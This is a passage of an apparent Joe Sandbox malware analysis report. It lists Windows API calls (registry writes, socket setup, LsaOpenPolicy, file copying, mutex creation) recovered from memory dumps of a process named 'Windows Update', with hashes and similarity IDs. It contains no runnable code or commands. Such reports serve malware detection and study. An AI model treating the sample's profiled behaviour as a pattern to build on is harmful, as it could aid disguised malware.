                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileType
                                                                                  • String ID:
                                                                                  • API String ID: 3081899298-0
                                                                                  • Opcode ID: 94b0f59bb872fb0cf990f54c8edb56a14201532ea4da45ddcd6a37411d223a09
                                                                                  • Instruction ID: 018ffadac019656ee463e37b945c0c6673953907b9cc59bf88e5f8f90d3825a3
                                                                                  • Opcode Fuzzy Hash: 94b0f59bb872fb0cf990f54c8edb56a14201532ea4da45ddcd6a37411d223a09
                                                                                  • Instruction Fuzzy Hash: 47210A76408780AFE712CB159C85BA3BFA8EF46324F0881DAF9848B193D324A905C771
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00640406, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenFileMappingW.KERNELBASE(?,?), ref: 00640491
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileMappingOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1680863896-0
                                                                                  • Opcode ID: 75f550d809f6e8c606170477f1597e668dfcae436399200d80e1cbdba2f9bf27
                                                                                  • Instruction ID: 0155ab3ddec8b8c265a86015332b612c636104a7b73d726233c28178b0450d93
                                                                                  • Opcode Fuzzy Hash: 75f550d809f6e8c606170477f1597e668dfcae436399200d80e1cbdba2f9bf27
                                                                                  • Instruction Fuzzy Hash: 562183B1505380AFE721CB55DC45FA6FFE8EF45310F0884AAE9849B292D375A904CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0064374A, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 006437C9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  • Opcode ID: ed64ccd0ee28b1f473e9fef068334ae4c7ce140348f9546b7f8ae0e5bb07999d
                                                                                  • Instruction ID: a7f8d5f12104b4e5c99af0f6444824dfd9b4d620f924bb264285f316629e06cd
                                                                                  • Opcode Fuzzy Hash: ed64ccd0ee28b1f473e9fef068334ae4c7ce140348f9546b7f8ae0e5bb07999d
                                                                                  • Instruction Fuzzy Hash: 9A217FB2500304AFFB21DF55DC85FABFBACEF04760F04896AF945DA241D635E9058AB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011B82E, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WSASocketW.WS2_32(?,?,?,?,?), ref: 0011B8BA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Socket
                                                                                  • String ID:
                                                                                  • API String ID: 38366605-0
                                                                                  • Opcode ID: b9208bf353b636f47ab3b949139af364fbf96014d397a31f61d15e4dc14c6518
                                                                                  • Instruction ID: b142dc4e91d64150360eb5a4e0c764bce2c42291d4ebe6000d1b581678d7281a
                                                                                  • Opcode Fuzzy Hash: b9208bf353b636f47ab3b949139af364fbf96014d397a31f61d15e4dc14c6518
                                                                                  • Instruction Fuzzy Hash: B9218271509344AFE721CF51DC45F96FFB8EF05310F0484AEE9858B252D375A808CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0064354B, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RasConnectionNotificationA.RASAPI32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 006435E7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConnectionNotification
                                                                                  • String ID:
                                                                                  • API String ID: 1402429939-0
                                                                                  • Opcode ID: c564a55da92a38a06a88185175893f83bd16ad71fa0a4cf90adc16af0bb01312
                                                                                  • Instruction ID: a31cf3f4c1d1e170dbf9a0f4944971283e801e5e8da4991e08d2eaf0487740ff
                                                                                  • Opcode Fuzzy Hash: c564a55da92a38a06a88185175893f83bd16ad71fa0a4cf90adc16af0bb01312
                                                                                  • Instruction Fuzzy Hash: 8E21B2754097C4AFE7128B21DC55FA2FFB8EF02314F0984DBE9848B293D225A909C775
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011BC2A, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 0011BCA9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 22f51e866a3b4c3ae3db37b36cdb9e698e4fee5bf18df18cd66684ef162de0f0
                                                                                  • Instruction ID: c87a328fe22411a65d4b3442e64c91d0796df3c669c9804f6e64cedede0c4ddc
                                                                                  • Opcode Fuzzy Hash: 22f51e866a3b4c3ae3db37b36cdb9e698e4fee5bf18df18cd66684ef162de0f0
                                                                                  • Instruction Fuzzy Hash: AE218E71504700EFEB21DF65CC85BA6FBE8EF08710F14846EE9498B252D771E944CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006420A0, Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 00642131
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExtentPoint32Text
                                                                                  • String ID:
                                                                                  • API String ID: 223599850-0
                                                                                  • Opcode ID: 6f11c55b0bb609cc9c7a4d4a1b0f4a5e4b3854a167fbdfb998b2be1be50611f8
                                                                                  • Instruction ID: c791960c43af5c8e7ff07700308073bd1d1da9f054acc897cb37a8d01c984182
                                                                                  • Opcode Fuzzy Hash: 6f11c55b0bb609cc9c7a4d4a1b0f4a5e4b3854a167fbdfb998b2be1be50611f8
                                                                                  • Instruction Fuzzy Hash: EC2190715093C09FD722CB25CC95BA2BFF4EF17260F0984DBE984CB263D225A809CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00644AD6, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegSetValueExW.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00644B68
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value
                                                                                  • String ID:
                                                                                  • API String ID: 3702945584-0
                                                                                  • Opcode ID: 875f6f1eddf1c7f424790091d8fc11120ff3393b13e4e8290439ca970128415c
                                                                                  • Instruction ID: b43beab688f669bd363bd6160708d47ad4364b8a7c7d3826b83b9a05436451bd
                                                                                  • Opcode Fuzzy Hash: 875f6f1eddf1c7f424790091d8fc11120ff3393b13e4e8290439ca970128415c
                                                                                  • Instruction Fuzzy Hash: F121BE72104780AFE722CF11CC45FA7FFB8EF06310F08859AF9859B292C665E949CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006452BD, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegSetValueExW.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00645354
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value
                                                                                  • String ID:
                                                                                  • API String ID: 3702945584-0
                                                                                  • Opcode ID: d0b9b51d6417ad80aca3903dc62c7139a08ec095087fd6dd4cfc64d3f80b502e
                                                                                  • Instruction ID: b9329dfde92a903b561acb684e838d22fbd34f935cd6f838f73cf07e71d928b7
                                                                                  • Opcode Fuzzy Hash: d0b9b51d6417ad80aca3903dc62c7139a08ec095087fd6dd4cfc64d3f80b502e
                                                                                  • Instruction Fuzzy Hash: 5821AFB2504740AFE722CF11CC45F97BFE8EF05350F08859AF9859B292D265E908CB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0064016A, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegQueryValueExW.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 006401FC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: 0e88ea77da151227707b8c003f7df8a8c2a33df8eb4b5d64e63e3013326b370a
                                                                                  • Instruction ID: 0a346125cbc4098e1c988f6fdcb0b69d018e87b86667aa172e3d860dc986c788
                                                                                  • Opcode Fuzzy Hash: 0e88ea77da151227707b8c003f7df8a8c2a33df8eb4b5d64e63e3013326b370a
                                                                                  • Instruction Fuzzy Hash: EC219A72505340AFE722CF51DC44FA7BBE8EF05320F08859AEA859B292C275E948CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011AB56, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 0011ABD5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  • Opcode ID: 84d1eed58e9672f5ca7c450e0db8c35a0d127df0d9edaf5d01b94ab111f2084a
                                                                                  • Instruction ID: 44699bbd8d8cebd6d9ca6fcaff22aab4315b5eb9e019e97c298fc41c3b9be0c3
                                                                                  • Opcode Fuzzy Hash: 84d1eed58e9672f5ca7c450e0db8c35a0d127df0d9edaf5d01b94ab111f2084a
                                                                                  • Instruction Fuzzy Hash: B6219D72500304EFFB20DE11DC85FAAFBACEF04750F04856AF9459A241D635E9488AB2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00640E79, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • getsockname.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00640EFF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: getsockname
                                                                                  • String ID:
                                                                                  • API String ID: 3358416759-0
                                                                                  • Opcode ID: 7be41444d160c0f73bf68a8f149a903f3f6235268e925877d455de0fc2d8cb89
                                                                                  • Instruction ID: 8934ff46a35f3fb3e0bdbc5884cc00996038751b4b9c7cf04b72347f6bfbb745
                                                                                  • Opcode Fuzzy Hash: 7be41444d160c0f73bf68a8f149a903f3f6235268e925877d455de0fc2d8cb89
                                                                                  • Instruction Fuzzy Hash: E9218071509384AFE721CF51CC45F96BFA8EF45320F0884AAEA489B192D274A948CB75
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006444C3, Relevance: 1.6, APIs: 1, Instructions: 74libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(?,00000E40), ref: 00644563
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 5989a8e30f5304c241bc98f6038f6612a9140fac56c179a97f12ab575110557e
                                                                                  • Instruction ID: d3745f01d4cac0e59e057eb47a3fcce02867525d1dff4151a7d5d96797491a0a
                                                                                  • Opcode Fuzzy Hash: 5989a8e30f5304c241bc98f6038f6612a9140fac56c179a97f12ab575110557e
                                                                                  • Instruction Fuzzy Hash: 7221DA71545380AFE722CB10DD45FA6BFB8DF46720F0880DAE9849F192D269A949C771
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011BEB2, Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • setsockopt.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 0011BF31
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: setsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 3981526788-0
                                                                                  • Opcode ID: a30cd6fd6e1a3b97b5deed3ff1e0c3aec4b41c79cace3047ad0c07992688b40a
                                                                                  • Instruction ID: 016fe37257f9961ed07b35a7952735a9e9b62027cfe7164332f224f019dcc17c
                                                                                  • Opcode Fuzzy Hash: a30cd6fd6e1a3b97b5deed3ff1e0c3aec4b41c79cace3047ad0c07992688b40a
                                                                                  • Instruction Fuzzy Hash: A921AEB2405340AFEB22CF51DC44FA7BFA8EF45720F0485AAF9449A152C275A949CBB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0064394A, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 006439BE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  • Opcode ID: e20d4c7534c07fcac78cfe8272c4446cc3ff14d2fd80d48f221fe003512d6f30
                                                                                  • Instruction ID: b27b13df7c2af742048046c1ee4cc0b2836424709dee82899e415df1a5be52b4
                                                                                  • Opcode Fuzzy Hash: e20d4c7534c07fcac78cfe8272c4446cc3ff14d2fd80d48f221fe003512d6f30
                                                                                  • Instruction Fuzzy Hash: 8A21CD72600344EFFB20DF54DC85FABFBA8EF04760F04896AFD449A242D675E9098A71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011B31E, Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LsaOpenPolicy.ADVAPI32(?,00000E40), ref: 0011B38F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: OpenPolicy
                                                                                  • String ID:
                                                                                  • API String ID: 2030686058-0
                                                                                  • Opcode ID: a4de5aaef195042f661bff4341a987bc5538547fd1a3f850502946c49fe66b2a
                                                                                  • Instruction ID: 99bc2a33e379b13c557d64f0e921f649c35af4003d7dba49c1e510ea0a93c877
                                                                                  • Opcode Fuzzy Hash: a4de5aaef195042f661bff4341a987bc5538547fd1a3f850502946c49fe66b2a
                                                                                  • Instruction Fuzzy Hash: 5F21DC72504304EFFB20DF64DC85FAAFBA8FF04320F04886AED44CA241D770A8488A72
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006408A2, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateMutexW.KERNEL32(?,?), ref: 00640915
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateMutex
                                                                                  • String ID:
                                                                                  • API String ID: 1964310414-0
                                                                                  • Opcode ID: 6e391c19a259a1d2e92d7902d43bc61b28581997aa443efe16626c06b8d2ce0e
                                                                                  • Instruction ID: fde4d922793bf879578a7ecdb374c89ed18ee31609a5db6b0be9341c244ded51
                                                                                  • Opcode Fuzzy Hash: 6e391c19a259a1d2e92d7902d43bc61b28581997aa443efe16626c06b8d2ce0e
                                                                                  • Instruction Fuzzy Hash: 25219D71600344AFF720DF25CC85BA6FBE8EF09710F04846AEE488B282D771E904CA62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00643486, Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WSAIoctl.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00643501
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Ioctl
                                                                                  • String ID:
                                                                                  • API String ID: 3041054344-0
                                                                                  • Opcode ID: b2d361c1304f7f371326df097246527a1d721987176318ed10ef740a6d7da2f0
                                                                                  • Instruction ID: 47a1fec8816d0ad1c13fb26410487293ee2ace6b1e0c8ea4201debaac7306066
                                                                                  • Opcode Fuzzy Hash: b2d361c1304f7f371326df097246527a1d721987176318ed10ef740a6d7da2f0
                                                                                  • Instruction Fuzzy Hash: 68218B72100700EFEB21CF51DC85FA6FBE8EF04710F08896AED498A651D731EA44CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011BB32, Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesExW.KERNEL32(?,?,?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 0011BBAA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: a98047345838808f28efa9cce5e7185d724aa78fdca6454cd12293fa66872e05
                                                                                  • Instruction ID: ed5038c2c7868edab0140afb7a9b95673bf823bdf17c6e07a21d6ac28a5b22d5
                                                                                  • Opcode Fuzzy Hash: a98047345838808f28efa9cce5e7185d724aa78fdca6454cd12293fa66872e05
                                                                                  • Instruction Fuzzy Hash: CB217F765093809FDB12CB25DC85B92BFE4EF06310F0984EAE9848B163D3759848DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00640F5D, Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ioctlsocket.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00640FDB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ioctlsocket
                                                                                  • String ID:
                                                                                  • API String ID: 3577187118-0
                                                                                  • Opcode ID: b46b604bdb54ebc0b2b35dfbce6ada0b61d00b4132f6321cfccfe0e8ae44de40
                                                                                  • Instruction ID: a2a82b648e9f9b21d9a540c500cf9652f00d3f6b245adcbb93e789327ba5e8db
                                                                                  • Opcode Fuzzy Hash: b46b604bdb54ebc0b2b35dfbce6ada0b61d00b4132f6321cfccfe0e8ae44de40
                                                                                  • Instruction Fuzzy Hash: 8521C371509384AFE722CF10CC45F96FFA8EF46310F08849BF9489F192C275A948C761
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011B913, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • setsockopt.WS2_32(?,?,?,?,?), ref: 0011B990
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: setsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 3981526788-0
                                                                                  • Opcode ID: d936758dec5d2335cad4111cd3d49fef7d8a08cfc5dd22f4dd27bde9981ce05a
                                                                                  • Instruction ID: ae0ce6f94edf18b640437d111155071e6180596073a1b7b9634070f2ba5e7c94
                                                                                  • Opcode Fuzzy Hash: d936758dec5d2335cad4111cd3d49fef7d8a08cfc5dd22f4dd27bde9981ce05a
                                                                                  • Instruction Fuzzy Hash: 51219A724093C09FDB12CF619C85A96BFB4EF17220F0984DAE9888F163C3259849CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011B002, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTokenInformation.KERNELBASE(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 0011B06C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: InformationToken
                                                                                  • String ID:
                                                                                  • API String ID: 4114910276-0
                                                                                  • Opcode ID: 45ddefab2e13c8b33aa63092a5a09eeb148a7e63f6ccda62a7888c6c35e02d49
                                                                                  • Instruction ID: e290c34d7b893288ea990b72ad1ed66d719cc0b4de44794e554e94b276eaee66
                                                                                  • Opcode Fuzzy Hash: 45ddefab2e13c8b33aa63092a5a09eeb148a7e63f6ccda62a7888c6c35e02d49
                                                                                  • Instruction Fuzzy Hash: A5119D72500304EFEB21CF51DC85FABBBA8EF04320F14856AF9058A251D771AA488BB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011AC5E, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegQueryValueExW.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 0011ACD8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: 4929158fb4c60580fc4ae034223e004fb14355386a2d198dfa1e17b72f530d4a
                                                                                  • Instruction ID: e3f960bc585904a8075980a701a2f18b96a56824377b7d0be2b427957ec103fc
                                                                                  • Opcode Fuzzy Hash: 4929158fb4c60580fc4ae034223e004fb14355386a2d198dfa1e17b72f530d4a
                                                                                  • Instruction Fuzzy Hash: 79219D75201704AFEB20CF15DC84FA6BBECEF04760F44856AE945DB651D760E988CAB2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006451EC, Relevance: 1.6, APIs: 1, Instructions: 69fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CopyFileW.KERNEL32(?,?,?), ref: 00645262
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CopyFile
                                                                                  • String ID:
                                                                                  • API String ID: 1304948518-0
                                                                                  • Opcode ID: f851bc48db1ded841185ea094542270e7f1ba5990ab77f7902ed80bcef98d6fc
                                                                                  • Instruction ID: 841f4a79db7a9902134e628b03c90e8e974900128321babc29557295a546f2d9
                                                                                  • Opcode Fuzzy Hash: f851bc48db1ded841185ea094542270e7f1ba5990ab77f7902ed80bcef98d6fc
                                                                                  • Instruction Fuzzy Hash: 0221A4715093809FD712CF25DC45B93BFE8EF02210F0984EBE985CB263D264D944CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0064105E, Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: accept
                                                                                  • String ID:
                                                                                  • API String ID: 3005279540-0
                                                                                  • Opcode ID: a6ef32f3d9fe98131fd40731f2decd06ff67bb9c7a6c1e6a4fde848b62933664
                                                                                  • Instruction ID: 2694258993cf44e0c3e9b493d79655dcac3a2d4514bc3f6d5f16f2eb665fa74a
                                                                                  • Opcode Fuzzy Hash: a6ef32f3d9fe98131fd40731f2decd06ff67bb9c7a6c1e6a4fde848b62933664
                                                                                  • Instruction Fuzzy Hash: E4219DB1500344AFF720DF55DC85BA6FBE8EF09720F14846AED488B242D771A944CA62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00640426, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenFileMappingW.KERNELBASE(?,?), ref: 00640491
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileMappingOpen
